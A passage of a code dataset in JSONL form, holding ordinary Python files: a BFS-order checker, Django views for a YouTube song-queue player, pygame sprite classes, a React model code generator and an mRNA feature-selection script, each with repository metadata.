"line_number": 79, "usage_type": "name"}, {"api_name": "moviepy.video.io.bindings.mplfig_to_npimage", "line_number": 80, "usage_type": "call"}, {"api_name": "moviepy.editor.VideoClip", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "10783054060", "text": "import sys\ninput = sys.stdin.readline\nfrom collections import deque\nN = int(input())\ngraph = [[] for _ in range(N)]\nfor _ in range(N - 1):\n a, b = map(int, input().split())\n a -= 1\n b -= 1\n graph[a].append(b)\n graph[b].append(a)\nbase = map(int, input().rstrip().split())\nbase = list(elem - 1 for elem in base)\norder = [0] * N\nfor i in range(N):\n order[base[i]] = i\nfor iter in range(N):\n graph[iter].sort(key = lambda x : order[x])\ncheck = [False] * N\nqueue = deque()\nbfs_order = []\nqueue.append(0)\ncheck[0] = True\nwhile queue:\n basis = queue.popleft()\n bfs_order.append(basis)\n for elem in graph[basis]:\n if not check[elem]:\n check[elem] = True\n queue.append(elem)\nans = True\nfor iter in range(N):\n if base[iter] != bfs_order[iter]:\n ans = False\n break\nprint(1 if ans else 0)", "repo_name": "entrekid/daily_algorithm", "sub_path": "2020/0421/16940.py", "file_name": "16940.py", "file_ext": "py", "file_size_in_byte": 852, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.stdin", "line_number": 2, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "43776511829", "text": "from django.shortcuts import render\nfrom django.core import serializers\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom rest_framework.decorators import api_view, throttle_classes\nfrom rest_framework.throttling import AnonRateThrottle\n\nfrom tikplay.forms import YoutubeForm\nfrom tikplay.models import Song, Log\nfrom tikplay.youtube import get_id_from_url, get_video\nfrom tikplay.decorators import jsonp\nfrom tikplay.tikplayer import tikPlayer\nfrom tikplay.tasks import get_audio_url, pop\n\nimport json\nfrom requests import get\n# Create your views here.\n\n@api_view(['POST', 'GET'])\ndef add_song_view(request):\n\n if request.method == 'POST':\n form = YoutubeForm(request.POST)\n\n if form.is_valid():\n youtube_url = form.cleaned_data['youtube_url']\n video_id = get_id_from_url(youtube_url)\n video = get_video(video_id)\n\n print (video.title)\n\n try:\n latest = Song.objects.latest()\n position_count = latest.position+1\n except Song.DoesNotExist:\n position_count = 0\n\n\n\n song = Song(video_id=video.id,\n title=video.title,\n description=video.description,\n channel=video.channel,\n image=video.image,\n position=(position_count))\n\n log = Log(video_id=video.id,\n added_by=\"\")\n\n song.save()\n log.save()\n \n get_audio_url(song.id)\n \n if position_count == 0:\n tikPlayer.new()\n\n return HttpResponseRedirect('/')\n else:\n form = YoutubeForm()\n \n song_list = Song.objects.all()\n try:\n current_song = Song.objects.earliest()\n except:\n current_song = None\n return render(request, 'add_song.html', {'form': form, 'song_list': song_list, 'current_song': current_song, 'playing': tikPlayer.is_playing()})\n\n@api_view(['GET'])\n@jsonp\ndef get_history(request):\n output = serializers.serialize('json', Log.objects.all())\n return json.dumps(json.loads(output), indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef get_queue(request):\n output = serializers.serialize('json', Song.objects.all())\n return json.dumps(json.loads(output), indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef get_current(request):\n try:\n output = serializers.serialize('json', [Song.objects.earliest()])\n return json.dumps(json.loads(output), indent=4)\n except:\n return json.dumps(json.loads(\"[]\"), indent=4)\n\n\n@api_view(['GET'])\n@jsonp\ndef pop_current(request):\n\n nextSong = pop()\n\n if nextSong:\n output = serializers.serialize('json', [Song.objects.earliest()])\n tikPlayer.new()\n return json.dumps(json.loads(output), indent=4)\n else:\n tikPlayer.clear()\n return json.dumps(json.loads(\"[]\"), indent=4)\n\n\n@api_view(['GET'])\n@jsonp\ndef clear(request):\n Song.objects.all().delete()\n tikPlayer.clear()\n return json.dumps(json.loads(\"[]\"), indent=4)\n\nclass FiveTimesAnonPerMinute(AnonRateThrottle):\n rate = '5/minute'\n\n@api_view(['GET'])\n@throttle_classes([FiveTimesAnonPerMinute])\n@jsonp\ndef add_song(request):\n url = request.GET.get('url')\n video_id = request.GET.get('id')\n if url: \n try:\n video_id = get_id_from_url(url)\n except Exception as e:\n return json.dumps({\"error\": str(e)}, indent=4)\n\n \n if not video_id:\n return json.dumps({\"error\": \"Missing parameter\"}, indent=4)\n \n \n try:\n video = get_video(video_id)\n except Exception as e:\n return json.dumps({\"error\": str(e)}, indent=4)\n\n print (video.title)\n\n try:\n latest = Song.objects.latest()\n position_count = latest.position+1\n except Song.DoesNotExist:\n position_count = 0\n\n\n\n song = Song(video_id=video.id,\n title=video.title,\n 
description=video.description,\n channel=video.channel,\n image=video.image,\n position=(position_count))\n song.save()\n\n get_audio_url(song.id)\n \n if position_count == 0:\n tikPlayer.new()\n output = serializers.serialize('json', [song])\n return json.dumps(json.loads(output), indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef play(request):\n tikPlayer.play()\n return json.dumps({\"message\": \"OK\"}, indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef pause(request):\n tikPlayer.pause()\n return json.dumps({\"message\": \"OK\"}, indent=4)\n\n\n@api_view(['GET'])\n@jsonp\ndef toggleplay(request):\n if tikPlayer.is_playing():\n tikPlayer.pause()\n return json.dumps({\"message\": \"PAUSE\"}, indent=4)\n else:\n tikPlayer.play()\n return json.dumps({\"message\": \"PLAY\"}, indent=4)\n\n@api_view(['GET'])\n@jsonp\ndef is_playing(request):\n if tikPlayer.is_playing():\n return json.dumps({\"message\": \"PLAYING\"}, indent=4)\n else:\n return json.dumps({\"message\": \"PAUSED\"}, indent=4)", "repo_name": "thyjukki/tik-guildroom-app", "sub_path": "guildroom/tikplay/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5044, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tikplay.forms.YoutubeForm", "line_number": 23, "usage_type": "call"}, {"api_name": "tikplay.youtube.get_id_from_url", "line_number": 27, "usage_type": "call"}, {"api_name": "tikplay.youtube.get_video", "line_number": 28, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects.latest", "line_number": 33, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 33, "usage_type": "name"}, {"api_name": "tikplay.models.Song.DoesNotExist", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 35, "usage_type": "name"}, {"api_name": "tikplay.models.Song", "line_number": 40, "usage_type": "call"}, {"api_name": "tikplay.models.Log", "line_number": 47, "usage_type": "call"}, {"api_name": "tikplay.tasks.get_audio_url", "line_number": 53, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.new", "line_number": 56, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 56, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": "call"}, {"api_name": "tikplay.forms.YoutubeForm", "line_number": 60, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects.all", "line_number": 62, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 62, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.earliest", "line_number": 64, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.is_playing", "line_number": 67, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 67, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 19, "usage_type": "call"}, {"api_name": "django.core.serializers.serialize", "line_number": 72, "usage_type": "call"}, {"api_name": 
"django.core.serializers", "line_number": 72, "usage_type": "name"}, {"api_name": "tikplay.models.Log.objects.all", "line_number": 72, "usage_type": "call"}, {"api_name": "tikplay.models.Log.objects", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tikplay.models.Log", "line_number": 72, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 69, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 70, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 78, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 78, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.all", "line_number": 78, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 78, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 79, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 79, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 75, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 76, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 85, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 85, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.earliest", "line_number": 85, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 85, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 86, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 86, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 88, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 88, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 81, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 82, "usage_type": "name"}, {"api_name": "tikplay.tasks.pop", "line_number": 95, "usage_type": "call"}, {"api_name": "django.core.serializers.serialize", "line_number": 98, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 98, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.earliest", "line_number": 98, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 98, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.new", "line_number": 99, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 99, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 100, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 100, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.clear", "line_number": 102, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 102, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 103, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 103, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 91, "usage_type": "call"}, {"api_name": 
"tikplay.decorators.jsonp", "line_number": 92, "usage_type": "name"}, {"api_name": "tikplay.models.Song.objects.all", "line_number": 109, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 109, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 109, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.clear", "line_number": 110, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 110, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 111, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 106, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 107, "usage_type": "name"}, {"api_name": "rest_framework.throttling.AnonRateThrottle", "line_number": 113, "usage_type": "name"}, {"api_name": "tikplay.youtube.get_id_from_url", "line_number": 124, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 126, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 130, "usage_type": "call"}, {"api_name": "tikplay.youtube.get_video", "line_number": 134, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 136, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects.latest", "line_number": 141, "usage_type": "call"}, {"api_name": "tikplay.models.Song.objects", "line_number": 141, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 141, "usage_type": "name"}, {"api_name": "tikplay.models.Song.DoesNotExist", "line_number": 143, "usage_type": "attribute"}, {"api_name": "tikplay.models.Song", "line_number": 143, "usage_type": "name"}, {"api_name": "tikplay.models.Song", "line_number": 148, "usage_type": "call"}, {"api_name": "tikplay.tasks.get_audio_url", "line_number": 156, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.new", "line_number": 159, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 159, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 160, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 160, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 161, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 161, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 116, "usage_type": "call"}, {"api_name": "rest_framework.decorators.throttle_classes", "line_number": 117, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 118, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.play", "line_number": 166, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 166, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 167, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 163, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 164, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.pause", "line_number": 172, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 172, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 173, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 169, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 170, "usage_type": "name"}, 
{"api_name": "tikplay.tikplayer.tikPlayer.is_playing", "line_number": 179, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 179, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.pause", "line_number": 180, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 180, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 181, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer.play", "line_number": 183, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 183, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 184, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 176, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 177, "usage_type": "name"}, {"api_name": "tikplay.tikplayer.tikPlayer.is_playing", "line_number": 189, "usage_type": "call"}, {"api_name": "tikplay.tikplayer.tikPlayer", "line_number": 189, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 190, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 192, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 186, "usage_type": "call"}, {"api_name": "tikplay.decorators.jsonp", "line_number": 187, "usage_type": "name"}]}
+{"seq_id": "72839985368", "text": "import os\nfrom typing import Union\n\nimport pygame\nfrom pygame import Surface\nfrom pygame.event import EventType\nfrom pygame.surface import SurfaceType\nfrom PIL import Image as pilimg, ImageSequence\n\n\nclass Scene(object):\n\n def __init__(self, game, screen: Union[Surface, SurfaceType]):\n self.screen = screen\n self.game = game\n self.hovering_button = False\n self.objects = pygame.sprite.Group()\n\n def on_tick(self):\n pass\n\n def on_key_input(self, event: EventType):\n pass\n\n def on_milis(self, milis):\n pass\n\n def render_scene(self):\n pass\n\n def add_object_to_render(self, sprite):\n self.objects.add(sprite)\n\n def remove_object_to_render(self, sprite):\n self.objects.remove(sprite)\n\n def is_rendered(self, sprite):\n return sprite in self.objects\n\n @staticmethod\n def load_gif(filename):\n pil_image = pilimg.open(filename)\n frames = []\n for frame in ImageSequence.Iterator(pil_image):\n frame = frame.convert('RGBA')\n pygame_image = pygame.image.fromstring(\n frame.tobytes(), frame.size, frame.mode).convert_alpha()\n frames.append(pygame_image)\n return frames\n\n\nclass AnimatedImage(pygame.sprite.Sprite):\n def __init__(self, rect, images, speed):\n super().__init__()\n self.images = images\n self.image = self.images[0]\n self.rect = rect\n self.image_index = 0\n self.speed = speed\n self.current = 0\n\n def update(self, scene, events):\n self.current = self.current + 1\n if self.current != self.speed:\n return\n else:\n self.current = 0\n self.image_index += 1\n if self.image_index >= len(self.images):\n self.image_index = 0\n self.image = self.images[self.image_index]\n\n\nclass Text(pygame.sprite.Sprite):\n def __init__(self, text, position):\n super().__init__()\n self.image = text\n self.rect = text.get_rect(center=position)\n\n\nclass Rectangle(pygame.sprite.Sprite):\n def __init__(self, width, height, x, y, color):\n super().__init__()\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.image = pygame.Surface((width, height))\n self.rect = pygame.Rect(x, y, self.image.get_width(), self.image.get_height())\n self.color = color\n self.image.fill(color)\n\n def update(self, scene, events):\n self.image = pygame.Surface((self.width, self.height))\n self.image.fill(self.color)\n self.rect = pygame.Rect(self.x, self.y, self.image.get_width(), self.image.get_height())\n\n\nclass Image(pygame.sprite.Sprite):\n\n def __init__(self, image, rect):\n super().__init__()\n self.image = image\n self.rect = rect\n\n\nclass Button(pygame.sprite.Sprite):\n\n def __init__(self,\n rect=None,\n rect_color=None,\n rect_position=(0, 0),\n text=None,\n text_hovered=None,\n font=None,\n click_callback=None):\n super().__init__()\n self.rect = rect\n self.rect_color = rect_color\n self.rect_position = rect_position\n self.text = text\n self.text_hovered = text_hovered\n self.font = font\n\n if text is not None and rect is None:\n self.rect = text.get_rect(center=rect_position)\n\n self.original = self.text\n self.hovered = self.text_hovered\n\n self.image = self.original\n self.click_callback = click_callback\n\n def update(self, scene, events):\n is_colliding = self.rect.collidepoint(pygame.mouse.get_pos())\n already_hovering = scene.hovering_button\n\n if is_colliding and not already_hovering:\n self.image = self.hovered\n scene.hovering_button = True\n for event in events:\n if event.type == pygame.MOUSEBUTTONDOWN and is_colliding:\n if self.click_callback is not None:\n 
pygame.mixer.music.load(os.path.abspath(\"./resources/sounds/click.mp3\").replace(\"\\\\\", \"/\"))\n pygame.mixer.music.play(start=0.6)\n self.click_callback()\n\n elif is_colliding and already_hovering:\n self.image = self.original\n scene.hovering_button = True\n else:\n self.image = self.original\n scene.hovering_button = False\n\n\nclass SwitchButton(pygame.sprite.Sprite):\n\n def __init__(self, current_button, buttons):\n super().__init__()\n self.buttons = buttons\n self.current_button = current_button\n self.image = self.current_button.image\n self.rect = self.current_button.rect\n\n def set_current_button(self, button):\n self.current_button = button\n\n def update(self, scene, events):\n is_colliding = self.rect.collidepoint(pygame.mouse.get_pos())\n already_hovering = scene.hovering_button\n\n if is_colliding and not already_hovering:\n self.image = self.current_button.hovered\n scene.hovering_button = True\n for event in events:\n if event.type == pygame.MOUSEBUTTONDOWN and is_colliding:\n if self.current_button.click_callback is not None:\n pygame.mixer.music.load(os.path.abspath(\"./resources/sounds/click.mp3\").replace(\"\\\\\", \"/\"))\n pygame.mixer.music.play(start=0.6)\n self.current_button.click_callback()\n\n elif is_colliding and already_hovering:\n self.image = self.current_button.original\n scene.hovering_button = True\n else:\n self.image = self.current_button.original\n scene.hovering_button = False\n", "repo_name": "CustomEntity/dungeon-game", "sub_path": "scene/scene.py", "file_name": "scene.py", "file_ext": "py", "file_size_in_byte": 5864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.Union", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.Surface", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.surface.SurfaceType", "line_number": 13, "usage_type": "name"}, {"api_name": "pygame.sprite.Group", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.event.EventType", "line_number": 22, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 42, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 42, "usage_type": "name"}, {"api_name": "PIL.ImageSequence.Iterator", "line_number": 44, "usage_type": "call"}, {"api_name": "PIL.ImageSequence", "line_number": 44, "usage_type": "name"}, {"api_name": "pygame.image.fromstring", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 94, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 107, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 135, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 135, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 142, "usage_type": "attribute"}, 
{"api_name": "pygame.mixer.music.load", "line_number": 144, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 145, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 156, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 169, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 169, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 176, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 178, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 179, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 179, "usage_type": "attribute"}]}
+{"seq_id": "38592575248", "text": "from typing import List\n\n\nclass ReactModelGenerator:\n\n def __init__(self):\n self.imports = \"\"\n self.content = \"\"\n\n def clean(self):\n self.imports = \"\"\n self.content = \"\"\n\n def build_class(self, list_attr: List):\n self.build_headers()\n self.build_validate_function(list_attr)\n self.build_transform_function(list_attr)\n self.build_empty_function(list_attr)\n\n def build_headers(self):\n self.content += self.imports\n\n def build_validate_function(self, list_attr: List):\n self.content += \"export const validate\" + list_attr[0][\"name\"] + \" = (body) => {\\n\" +\\\n \" //const { } = body;\\n\" +\\\n \"}\\n\\n\"\n\n def build_transform_function(self, list_attr: List):\n self.content += \"export const transformEntity\" + list_attr[0][\"name\"] + \" = (entity) => {\\n\"\n self.content += \" let newEnt = {...entity}\\n\"\n for i in range(len(list_attr)):\n dict_attr = list_attr[i]\n if str(dict_attr[\"column\"]) == \"foreign\":\n self.content += \" newEnt.\" + dict_attr[\"name\"] + \" = newEnt.\" +\\\n dict_attr[\"name\"] + \"?.\" + dict_attr[\"fe_pk\"] + \";\\n\"\n self.content += \" return newEnt;\\n\"\n self.content += \"}\\n\\n\"\n\n def build_empty_function(self, list_attr: List):\n self.content += \"export const buildEmpty\" + list_attr[0][\"name\"] + \" = () => {\\n\"\n self.content += \" return {\\n\"\n for i in range(len(list_attr)):\n dict_attr = list_attr[i]\n if dict_attr[\"type\"] != \"entity\" and not str(dict_attr[\"column\"]).startswith(\"foreign_ref\"):\n self.content += \" \" + dict_attr[\"name\"] + \": '',\\n\"\n self.content += \" };\\n\"\n self.content += \"}\\n\\n\"\n", "repo_name": "VictorAndres20/nest-backend-generator", "sub_path": "src/generator/react_model_generator.py", "file_name": "react_model_generator.py", "file_ext": "py", "file_size_in_byte": 1833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 39, "usage_type": "name"}]}
+{"seq_id": "11495766698", "text": "\"\"\"Keep 100 features with highest variance\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import MinMaxScaler\n\n\nmRNA_PATH = '/data/PanCancer_mRNA.txt'\n\n# Read data\ndata_mrna = pd.read_csv(mRNA_PATH, sep='\\t')\nmrna_samples = pd.read_csv(mRNA_PATH, sep='\\t', header=None, nrows=1)\nmrna_samples = mrna_samples.values.tolist()\nmrna_samples = mrna_samples[0]\nmrna_samples = mrna_samples[1:]\nfor j in range(len(mrna_samples)):\n\tmrna_samples[j] = mrna_samples[j][:12]\ndata_mrna.columns = ['sample'] + mrna_samples\ndata_mrna.fillna(0.0, inplace=True)\ndata_mrna = data_mrna.T\ndata_mrna.drop(index='sample', inplace=True)\n\n\n# Read patients ID in preprocessed clinical data\ndata_clin = pd.read_csv('/preprocessed_data/Pc_clinical_emb.csv', header=None)\nclin_samples = data_clin[[0]]\nclin_samples = clin_samples.values.tolist()\nclinical_samples = list()\nfor i in range(len(clin_samples)):\n\tclinical_samples.append(clin_samples[i][0])\nclin_samples = clinical_samples\n\n\n# Remove the rows with same patient ID\ndata_mrna.reset_index(inplace=True)\ndata_mrna = data_mrna.drop_duplicates(['index'])\ndata_mrna.reset_index(drop=True)\ndata_mrna.set_index('index', inplace=True)\n\n\n# Select the top 100 features with highest variance\nvar_arr = np.array(data_mrna.var())\nvar_list_idx = np.argsort(-var_arr)\ntop100idx = var_list_idx[:100]\ndata_mrna_100 = data_mrna.loc[:, top100idx]\n\n\n# min-max normalization\nscaler = MinMaxScaler()\nmrna_0_1 = scaler.fit_transform(data_mrna_100)\nmrna_f_df = pd.DataFrame(mrna_0_1)\nmrna_f_df.index = data_mrna.index\nmrna_f_df.reset_index(inplace=True)\n\n\n# Create all zero vector\na = mrna_f_df[mrna_f_df['index'] == 'TCGA-OR-A5J1']\nsample_row = a.copy()\nsample_row['index'] = 'xx'\nfor i in range(mrna_f_df.shape[1]-1):\n\tsample_row[i] = 0.0\n\n\n# Fill NaN with zero vectors\ni = 0\nfor x in clin_samples:\n\tif i == 0:\n\t\tmrna = mrna_f_df[mrna_f_df['index'] == x]\n\t\tif mrna.shape[0] == 0:\n\t\t\tmrna = sample_row.copy()\n\t\t\tmrna['index'] = x\n\t\ti += 1\n\telse:\n\t\tmrna_row = mrna_f_df[mrna_f_df['index'] == x]\n\t\tif mrna_row.shape[0] == 0:\n\t\t\tmrna_row = sample_row.copy()\n\t\t\tmrna_row['index'] = x\n\t\tmrna = pd.concat([mrna, mrna_row], axis = 0)\n\n\n# Save data\nmrna.set_index('index', inplace=True)\nmrna.to_csv(f'/preprocessed_data/PC_mRNA_100.csv', index=False, header=False)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "ZhangqiJiang07/MultimodalSurvivalPrediction", "sub_path": "preprocess/mrna_rsf_cph.py", "file_name": "mrna_rsf_cph.py", "file_ext": "py", "file_size_in_byte": 2303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 52, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 79, "usage_type": "call"}]}
